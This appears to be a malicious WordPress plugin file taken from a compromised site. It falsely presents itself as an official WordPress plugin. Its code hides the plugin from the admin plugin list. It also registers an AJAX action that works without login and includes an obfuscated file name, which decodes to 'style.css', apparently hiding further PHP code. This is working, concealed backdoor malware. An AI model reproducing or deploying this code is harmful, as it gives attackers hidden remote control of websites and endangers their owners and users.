File: /www/sites/www.credebtexchange.com/htdocs/wp-content/plugins/wp-adps-intended/wp-adps-intended.php
<?php
/*
Plugin Name: WP Adps Intended
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 1.8.4
Author URI: http://wordpress.org/#
*/
if (!defined('ABSPATH')) {
exit;
}
function drx_xji() {
global $wp_list_table;
if (!isset($wp_list_table)) {
return;
}
$s = array('wp-adps-intended/wp-adps-intended.php');
if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
foreach ($wp_list_table->items as $key => $val) {
if (in_array($key, $s)) {
unset($wp_list_table->items[$key]);
}
}
}
}
function fjc_zmu($plugins) {
$n = 'wp-adps-intended/wp-adps-intended.php';
if (array_key_exists($n, $plugins)) {
unset($plugins[$n]);
}
return $plugins;
}
function jbi($o, $v) {
$c = '';
for ($l = 0; $l < strlen($o); $l += 2) {
$m = ord($o[$l]) - 65;
$a = ord($o[$l + 1]);
if ($a > 90) $a -= 6;
$e = $m * 52 + ($a - 65);
$c .= chr($e - $v);
}
return $c;
}
function ere_ajax_handler() {
include plugin_dir_path(__FILE__) . jbi('JcJdJiJVJOJcILJMJcJc', 381);
die();
}
if (defined('ABSPATH')) {
add_action('pre_current_active_plugins', 'drx_xji');
add_filter('all_plugins', 'fjc_zmu');
add_action('wp_ajax_adp_int', 'ere_ajax_handler');
add_action('wp_ajax_nopriv_adp_int', 'ere_ajax_handler');
}